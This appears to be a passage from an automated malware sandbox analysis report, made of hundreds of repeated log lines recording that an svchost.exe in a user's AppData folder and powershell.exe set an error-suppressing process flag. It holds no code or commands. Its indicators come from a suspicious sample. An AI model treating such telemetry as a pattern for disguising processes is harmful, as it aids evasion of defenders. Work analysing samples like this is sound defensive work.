                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
